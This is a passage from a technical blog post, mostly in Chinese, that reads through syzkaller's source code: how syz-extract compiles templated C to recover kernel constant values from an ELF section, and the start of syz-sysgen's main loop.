class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> srcTemplate = template.Must(template.New(<span class="string">&quot;&quot;</span>).Parse(<span class="string">`</span></span><br><span class="line"><span class="string">&#123;&#123;if not .ExtractFromELF&#125;&#125;</span></span><br><span class="line"><span class="string">#define 
__asm__(...)</span></span><br><span class="line"><span class="string">&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#123;&#123;if .DefineGlibcUse&#125;&#125;</span></span><br><span class="line"><span class="string">#ifndef __GLIBC_USE</span></span><br><span class="line"><span class="string">#    define __GLIBC_USE(X) 0</span></span><br><span class="line"><span class="string">#endif</span></span><br><span class="line"><span class="string">&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#123;&#123;range $incl := $.Includes&#125;&#125;</span></span><br><span class="line"><span class="string">#include &lt;&#123;&#123;$incl&#125;&#125;&gt;</span></span><br><span class="line"><span class="string">&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#123;&#123;range $name, $val := $.Defines&#125;&#125;</span></span><br><span class="line"><span class="string">#ifndef &#123;&#123;$name&#125;&#125;</span></span><br><span class="line"><span class="string">#    define &#123;&#123;$name&#125;&#125; &#123;&#123;$val&#125;&#125;</span></span><br><span class="line"><span class="string">#endif</span></span><br><span class="line"><span class="string">&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#123;&#123;.AddSource&#125;&#125;</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#123;&#123;if .DeclarePrintf&#125;&#125;</span></span><br><span class="line"><span class="string">int printf(const char *format, ...);</span></span><br><span class="line"><span class="string">&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span 
class="string"></span></span><br><span class="line"><span class="string">&#123;&#123;if .ExtractFromELF&#125;&#125;</span></span><br><span class="line"><span class="string">__attribute__((section(&quot;syz_extract_data&quot;)))</span></span><br><span class="line"><span class="string">unsigned long long vals[] = &#123;</span></span><br><span class="line"><span class="string">    &#123;&#123;range $val := $.Values&#125;&#125;(unsigned long long)&#123;&#123;$val&#125;&#125;,</span></span><br><span class="line"><span class="string">    &#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string">&#125;;</span></span><br><span class="line"><span class="string">&#123;&#123;else&#125;&#125;</span></span><br><span class="line"><span class="string">int main() &#123;</span></span><br><span class="line"><span class="string">    int i;</span></span><br><span class="line"><span class="string">    unsigned long long vals[] = &#123;</span></span><br><span class="line"><span class="string">        &#123;&#123;range $val := $.Values&#125;&#125;(unsigned long long)&#123;&#123;$val&#125;&#125;,</span></span><br><span class="line"><span class="string">        &#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span class="string">    &#125;;</span></span><br><span class="line"><span class="string">    for (i = 0; i &lt; sizeof(vals)/sizeof(vals[0]); i++) &#123;</span></span><br><span class="line"><span class="string">        if (i != 0)</span></span><br><span class="line"><span class="string">            printf(&quot; &quot;);</span></span><br><span class="line"><span class="string">        printf(&quot;%llu&quot;, vals[i]);</span></span><br><span class="line"><span class="string">    &#125;</span></span><br><span class="line"><span class="string">    return 0;</span></span><br><span class="line"><span class="string">&#125;</span></span><br><span class="line"><span class="string">&#123;&#123;end&#125;&#125;</span></span><br><span class="line"><span 
class="string">`</span>))</span><br></pre></td></tr></table></figure><p>As the template shows, it merges the include, define, and const strings previously collected from the syzlang descriptions:</p><ul><li>If the ExtractFromELF flag is set, <strong>all const values are placed in a section named syz_extract_data</strong>.</li><li>If the flag is not set, <strong>the compiled program prints the const values in order to stdout, formatted with <code>%llu</code> and separated by spaces</strong>. syz-extract can then parse the program's output to determine the value of each const.</li></ul><p>Back in <code>extract</code>: syzlang descriptions are easy to get wrong, and some consts and syscall numbers are not defined on every architecture, so syz-extract tries to recover from compile errors automatically:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span 
class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `extract`</span></span><br><span class="line"><span class="keyword">for</span> &#123;</span><br><span class="line">    bin1, out, err := compile(cc, args, data)</span><br><span class="line">    <span class="keyword">if</span> err == <span class="literal">nil</span> &#123;</span><br><span class="line">        bin = bin1</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// Some consts and syscall numbers are not defined on some archs.</span></span><br><span class="line">    <span class="comment">// Figure out from compiler output undefined consts,</span></span><br><span class="line">    <span class="comment">// and try to compile again without them.</span></span><br><span class="line">    <span class="comment">// May need to try multiple times because some severe errors terminate compilation.</span></span><br><span class="line">    tryAgain := <span class="literal">false</span></span><br><span class="line">    <span class="comment">// Match the compiler output against each predefined error pattern (regular expressions)</span></span><br><span class="line">    <span class="keyword">for</span> _, errMsg := <span class="keyword">range</span> []<span class="type">string</span>&#123;</span><br><span class="line">        <span class="string">`error: [‘&#x27;]([a-zA-Z0-9_]+)[’&#x27;] undeclared`</span>,</span><br><span class="line">        <span class="string">`note: in expansion of macro [‘&#x27;]([a-zA-Z0-9_]+)[’&#x27;]`</span>,</span><br><span class="line">        <span class="string">`note: expanded from macro 
[‘&#x27;]([a-zA-Z0-9_]+)[’&#x27;]`</span>,</span><br><span class="line">        <span class="string">`error: use of undeclared identifier [‘&#x27;]([a-zA-Z0-9_]+)[’&#x27;]`</span>,</span><br><span class="line">    &#125; &#123;</span><br><span class="line">        re := regexp.MustCompile(errMsg)</span><br><span class="line">        matches := re.FindAllSubmatch(out, <span class="number">-1</span>)</span><br><span class="line">        <span class="comment">// On a match, record the offending const in undeclared</span></span><br><span class="line">        <span class="keyword">for</span> _, match := <span class="keyword">range</span> matches &#123;</span><br><span class="line">            val := <span class="type">string</span>(match[<span class="number">1</span>])</span><br><span class="line">            <span class="keyword">if</span> valMap[val] &amp;&amp; !undeclared[val] &#123;</span><br><span class="line">                undeclared[val] = <span class="literal">true</span></span><br><span class="line">                tryAgain = <span class="literal">true</span></span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> !tryAgain &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">nil</span>, <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;failed to run compiler: %v %v\n%v\n%s&quot;</span>,</span><br><span class="line">                                    cc, args, err, out)</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// Reset the list of consts to compile</span></span><br><span class="line">    data.Values = <span class="literal">nil</span></span><br><span class="line">    <span class="comment">// Drop the failing consts and keep the remaining ones for the next compile attempt</span></span><br><span class="line">    <span class="keyword">for</span> _, v := <span 
class="keyword">range</span> info.Consts &#123;</span><br><span class="line">        <span class="keyword">if</span> undeclared[v] &#123;</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        &#125;</span><br><span class="line">        data.Values = <span class="built_in">append</span>(data.Values, v)</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// This part looks redundant: since missingIncludes stays empty, the loop just rebuilds data.Includes unchanged from info.Includes</span></span><br><span class="line">    data.Includes = <span class="literal">nil</span></span><br><span class="line">    <span class="keyword">for</span> _, v := <span class="keyword">range</span> info.Includes &#123;</span><br><span class="line">        <span class="comment">// missingIncludes is created empty and never written to, so this check never fires</span></span><br><span class="line">        <span class="keyword">if</span> missingIncludes[v] &#123;</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        &#125;</span><br><span class="line">        data.Includes = <span class="built_in">append</span>(data.Includes, v)</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>After that, the values are read from the compiled binary, parsed, and returned:</p><blockquote><p>Note: the call to <code>os.Remove(bin)</code> is wrapped in <strong>defer</strong>, so the compiled binary is <strong>not deleted immediately</strong>. The removal runs only when extract returns, that is, <strong>after the values have been read from the file</strong>.</p></blockquote><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span 
class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// 将新编译出的二进制文件删除</span></span><br><span class="line"><span class="keyword">defer</span> os.Remove(bin)</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> flagVals []<span class="type">uint64</span></span><br><span class="line"><span class="keyword">var</span> err <span class="type">error</span></span><br><span class="line"><span class="keyword">if</span> data.ExtractFromELF &#123;</span><br><span class="line">    flagVals, err = extractFromELF(bin, params.TargetEndian)</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    flagVals, err = extractFromExecutable(bin)</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">nil</span>, <span class="literal">nil</span>, err</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> <span class="built_in">len</span>(flagVals) != <span class="built_in">len</span>(data.Values) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">nil</span>, <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;fetched wrong number of values %v, want != %v&quot;</span>,</span><br><span class="line">                                <span class="built_in">len</span>(flagVals), <span class="built_in">len</span>(data.Values))</span><br><span class="line">&#125;</span><br><span class="line">res := <span 
class="built_in">make</span>(<span class="keyword">map</span>[<span class="type">string</span>]<span class="type">uint64</span>)</span><br><span class="line"><span class="keyword">for</span> i, name := <span class="keyword">range</span> data.Values &#123;</span><br><span class="line">    res[name] = flagVals[i]</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">return</span> res, undeclared, <span class="literal">nil</span></span><br></pre></td></tr></table></figure><p>操作二进制文件的代码主要是这几行：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> data.ExtractFromELF &#123;</span><br><span class="line">    flagVals, err = extractFromELF(bin, params.TargetEndian)</span><br><span class="line">&#125; <span class="keyword">else</span> &#123;</span><br><span class="line">    flagVals, err = extractFromExecutable(bin)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>若 ExtractFromELF 字段为 false，则 syz-extract 会走 else 分支，执行函数 extractFromExecutable。该函数将实际执行目标程序，解析其输出并转换为整型数组：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span 
class="function"><span class="keyword">func</span> <span class="title">extractFromExecutable</span><span class="params">(binFile <span class="type">string</span>)</span></span> ([]<span class="type">uint64</span>, <span class="type">error</span>) &#123;</span><br><span class="line">    out, err := osutil.Command(binFile).CombinedOutput()</span><br><span class="line">    <span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;failed to run flags binary: %v\n%s&quot;</span>, err, out)</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span> <span class="built_in">len</span>(out) == <span class="number">0</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">nil</span>, <span class="literal">nil</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">var</span> vals []<span class="type">uint64</span></span><br><span class="line">    <span class="keyword">for</span> _, val := <span class="keyword">range</span> strings.Split(<span class="type">string</span>(out), <span class="string">&quot; &quot;</span>) &#123;</span><br><span class="line">        n, err := strconv.ParseUint(val, <span class="number">10</span>, <span class="number">64</span>)</span><br><span class="line">        <span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;failed to parse value: %v (%v)&quot;</span>, err, val)</span><br><span class="line">        &#125;</span><br><span class="line">        vals = <span class="built_in">append</span>(vals, n)</span><br><span class="line">    &#125;</span><br><span class="line">   
 <span class="keyword">return</span> vals, <span class="literal">nil</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>但由于 OS 为 Linux 时，其 ExtractFromELF 标志为 true，因此会执行 extractFromELF 函数。在该函数中， syz-extract 将<strong>不会实际执行程序</strong>，而是<strong>从 ELF 文件中一个名为 <code>syz_extract_data</code> 的 section 中读取常量值</strong>：</p><blockquote><p>而且也执行不起来，因为先前手动不让二进制文件执行 link 操作，还没 main 函数。</p></blockquote><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">extractFromELF</span><span class="params">(binFile <span class="type">string</span>, targetEndian binary.ByteOrder)</span></span> ([]<span class="type">uint64</span>, <span class="type">error</span>) &#123;</span><br><span class="line">    f, err := os.Open(binFile)</span><br><span class="line">    <span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">    &#125;</span><br><span class="line">    ef, err := 
elf.NewFile(f)</span><br><span class="line">    <span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">for</span> _, sec := <span class="keyword">range</span> ef.Sections &#123;</span><br><span class="line">        <span class="keyword">if</span> sec.Name != <span class="string">&quot;syz_extract_data&quot;</span> &#123;</span><br><span class="line">            <span class="keyword">continue</span></span><br><span class="line">        &#125;</span><br><span class="line">        data, err := ioutil.ReadAll(sec.Open())</span><br><span class="line">        <span class="keyword">if</span> err != <span class="literal">nil</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">        &#125;</span><br><span class="line">        vals := <span class="built_in">make</span>([]<span class="type">uint64</span>, <span class="built_in">len</span>(data)/<span class="number">8</span>)</span><br><span class="line">        <span class="keyword">if</span> err := binary.Read(bytes.NewReader(data), targetEndian, &amp;vals); err != <span class="literal">nil</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">nil</span>, err</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> vals, <span class="literal">nil</span></span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">nil</span>, fmt.Errorf(<span class="string">&quot;did not find syz_extract_data section&quot;</span>)</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure><blockquote><p>这样做的目的貌似是为了<strong>提高常量读取速度</strong>，因为读取文件远比执行程序来的快。</p></blockquote><h3 id="8-小结">8. 小结</h3><p>syz-extract 会调用自定义 compiler 解析 syzlang 为 ast 森林，并依次提取每个 ast 树上的 consts 节点，然后将这些 consts 节点上的字符串放置进模板中，编译模板生成一个 ELF 或其他可执行文件。</p><p>接下来 syz-extract 会分析 ELF 文件上的数据，或者尝试执行可执行文件来解析其输出，以获得各个 consts 字符串所对应的具体整型值。</p><p>最后 syz-extract 将获取到的 consts 字符串与具体整型的映射关系，一个个序列化并填入 <code>.const</code> 文件中，这样便生成了对应于每个 syzlang 文件的 .const 文件。</p><p>在 syz-extract 执行的整个过程中，syz-extract 另起一个 go routine 来执行 worker，是为了能达到边进行常量提取，边将先前已有的提取结果存放进文件中，这样做是为了提高效率，加快常量提取的速度。</p><p>调试用的 vscode launch.json 文件：</p><figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;version&quot;</span><span class="punctuation">:</span> <span class="string">&quot;0.2.0&quot;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;configurations&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span></span><br><span class="line">        <span class="punctuation">&#123;</span></span><br><span class="line">            <span class="attr">&quot;name&quot;</span><span class="punctuation">:</span> <span class="string">&quot;syzextractLaunch&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span 
class="attr">&quot;type&quot;</span><span class="punctuation">:</span> <span class="string">&quot;go&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;request&quot;</span><span class="punctuation">:</span> <span class="string">&quot;launch&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;mode&quot;</span><span class="punctuation">:</span> <span class="string">&quot;auto&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;program&quot;</span><span class="punctuation">:</span> <span class="string">&quot;$&#123;fileDirname&#125;&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;env&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span><span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;cwd&quot;</span><span class="punctuation">:</span> <span class="string">&quot;/usr/class/syzkaller&quot;</span><span class="punctuation">,</span></span><br><span class="line">            <span class="attr">&quot;args&quot;</span><span class="punctuation">:</span> <span class="punctuation">[</span><span class="string">&quot;-sourcedir&quot;</span><span class="punctuation">,</span> <span class="string">&quot;/usr/class/linux&quot;</span><span class="punctuation">,</span> <span class="string">&quot;-arch&quot;</span><span class="punctuation">,</span> <span class="string">&quot;amd64&quot;</span><span class="punctuation">]</span> </span><br><span class="line">        <span class="punctuation">&#125;</span></span><br><span class="line">    <span class="punctuation">]</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure><h2 
id="三、syz-sysgen">三、syz-sysgen</h2><blockquote><p>代码位于 <code>sys/syz-sysgen/sysgen.go</code> 中。</p></blockquote><p>syz-sysgen 用于解析人工编写的 syzlang 代码文件，并将其中定义的 syscall 类型信息转换成后续 syzkaller 能够使用的数据结构。</p><p>在理解了 syz-extract 的代码后，syz-sysgen 的代码相对来说也比较好理解，接下来我们先从 main 函数开始看起。</p><h3 id="1-main-2">1. main</h3><p>首先是将所有 OS 的类型都取出来，并且创建了用于存储结果的结构体：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey：in Function main</span></span><br><span class="line"><span class="keyword">defer</span> tool.Init()()</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> OSList []<span class="type">string</span></span><br><span class="line"><span class="keyword">for</span> OS := <span class="keyword">range</span> targets.List &#123;</span><br><span class="line">    OSList = <span class="built_in">append</span>(OSList, OS)</span><br><span class="line">&#125;</span><br><span class="line">sort.Strings(OSList)</span><br><span class="line"></span><br><span class="line">data := &amp;ExecutorData&#123;&#125;</span><br></pre></td></tr></table></figure><p>其中第一行的 golang <code>defer</code> 关键字表示，<strong>defer 后面的函数调用将被推迟到外层函数返回（包括发生 panic）时才执行</strong>。注意 <code>tool.Init()</code> 本身会立即执行，被推迟的是它返回的那个函数。由于 <code>tool.Init()</code> 涉及到命令行中 CPU/Mem 分析，不在我们的考虑范畴，因此忽略不看。</p><p>完成这段代码的执行后，其变量情况如下图所示：</p><p><img src="/2022/03/syzkaller-1/image-20220309165347651.png" alt="image-20220309165347651"></p><p>紧接着便是一个 for 循环，遍历 OSList 中的每个 OS 字符串，并解析其中的 syzlang 代码。我将这个 for 循环分为了上中下三个部分：</p><ul><li><p>首先是第一部分：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span 
class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey：in Function main</span></span><br><span class="line"><span class="keyword">for</span> _, OS := <span class="keyword">range</span> OSList &#123;</span><br><span class="line">    descriptions := ast.ParseGlob(filepath.Join(*srcDir, <span class="string">&quot;sys&quot;</span>, OS, <span class="string">&quot;*.txt&quot;</span>), <span class="literal">nil</span>)</span><br><span class="line">    <span class="keyword">if</span> descriptions == <span class="literal">nil</span> &#123;</span><br><span class="line">        os.Exit(<span class="number">1</span>)</span><br><span class="line">    &#125;</span><br><span class="line">    constFile := compiler.DeserializeConstFile(filepath.Join(*srcDir, <span class="string">&quot;sys&quot;</span>, OS, <span class="string">&quot;*.const&quot;</span>), <span class="literal">nil</span>)</span><br><span class="line">    <span class="keyword">if</span> constFile == <span class="literal">nil</span> &#123;</span><br><span class="line">        os.Exit(<span class="number">1</span>)</span><br><span class="line">    &#125;</span><br><span class="line">  osutil.MkdirAll(filepath.Join(*outDir, <span class="string">&quot;sys&quot;</span>, OS, <span class="string">&quot;gen&quot;</span>))</span><br><span class="line"></span><br><span class="line">    <span 
class="keyword">var</span> archs []<span class="type">string</span></span><br><span class="line">    <span class="keyword">for</span> arch := <span class="keyword">range</span> targets.List[OS] &#123;</span><br><span class="line">        archs = <span class="built_in">append</span>(archs, arch)</span><br><span class="line">    &#125;</span><br><span class="line">  sort.Strings(archs)</span><br><span class="line"></span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这部分内容较为简单，将当前遍历到的 OS 所对应的 <code>sys/&lt;os&gt;/*.txt</code> 和 <code>sys/&lt;os&gt;/*.const</code>文件，分别解析成 AST 树 (ast.Description 类型) 和 ConstFile 结构体。之后创建 <code>sys/&lt;os&gt;/gen</code> 文件夹，整个 syz-sysgen 的输出将存放在该文件夹下：</p><p><img src="/2022/03/syzkaller-1/image-20220309170145753.png" alt="image-20220309170145753"></p><p>之后还是收集当前 OS 所对应的全部 arch 字符串集合，并做一次排序操作。</p></li><li><p>其次是第二部分：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey：in Function main</span></span><br><span 
class="line"><span class="keyword">for</span> _, OS := <span class="keyword">range</span> OSList &#123;</span><br><span class="line">    ...</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">var</span> jobs []*Job</span><br><span class="line">    <span class="keyword">for</span> _, arch := <span class="keyword">range</span> archs &#123;</span><br><span class="line">        jobs = <span class="built_in">append</span>(jobs, &amp;Job&#123;</span><br><span class="line">            Target:      targets.List[OS][arch],</span><br><span class="line">            Unsupported: <span class="built_in">make</span>(<span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span>),</span><br><span class="line">        &#125;)</span><br><span class="line">    &#125;</span><br><span class="line">    sort.Slice(jobs, <span class="function"><span class="keyword">func</span><span class="params">(i, j <span class="type">int</span>)</span></span> <span class="type">bool</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> jobs[i].Target.Arch &lt; jobs[j].Target.Arch</span><br><span class="line">    &#125;)</span><br><span class="line">    <span class="keyword">var</span> wg sync.WaitGroup</span><br><span class="line">    wg.Add(<span class="built_in">len</span>(jobs))</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> _, job := <span class="keyword">range</span> jobs &#123;</span><br><span class="line">        job := job</span><br><span class="line">        <span class="keyword">go</span> <span class="function"><span class="keyword">func</span><span class="params">()</span></span> &#123;</span><br><span class="line">            <span class="keyword">defer</span> wg.Done()</span><br><span class="line">            processJob(job, descriptions, constFile)</span><br><span class="line">        &#125;()</span><br><span class="line">    
&#125;</span><br><span class="line">    wg.Wait()</span><br><span class="line"></span><br><span class="line">    ...</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>首先是为每个 arch 都创建了一个 Job 结构体，将其添加进数组 jobs 中，并按 <code>Target.Arch</code> 的升序对数组排序。</p><p>接下来创建了一个 <code>sync.WaitGroup</code> 结构体，这个结构体用于<strong>等待指定数量的 goroutine 集合执行完成</strong>。其内部原理有点类似于信号量，执行 <code>wg.Add</code> 函数以增加其内部计数器值，执行 <code>wg.Done</code> 函数以减小其内部计数器值，执行 <code>wg.Wait</code> 则会阻塞，直到内部计数器归零。</p><p>其中最重要的是，syz-sysgen 依次遍历 jobs 数组中的每个 job，并创建 goroutine 并行执行这些 job。函数 processJob 用于编译先前 parse 的 syzlang AST、分析其中的类型信息与依赖关系，并将其序列化为 golang 代码至 <code>sys/&lt;OS&gt;/gen/&lt;arch&gt;.go</code> 中，同时还将 syscall 属性相关的信息保存在 <code>job.ArchData</code> 中，供后续生成 syz-executor 关键头文件代码所用。</p></li><li><p>最后是第三部分：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey：in Function main</span></span><br><span class="line"><span class="keyword">for</span> _, OS := 
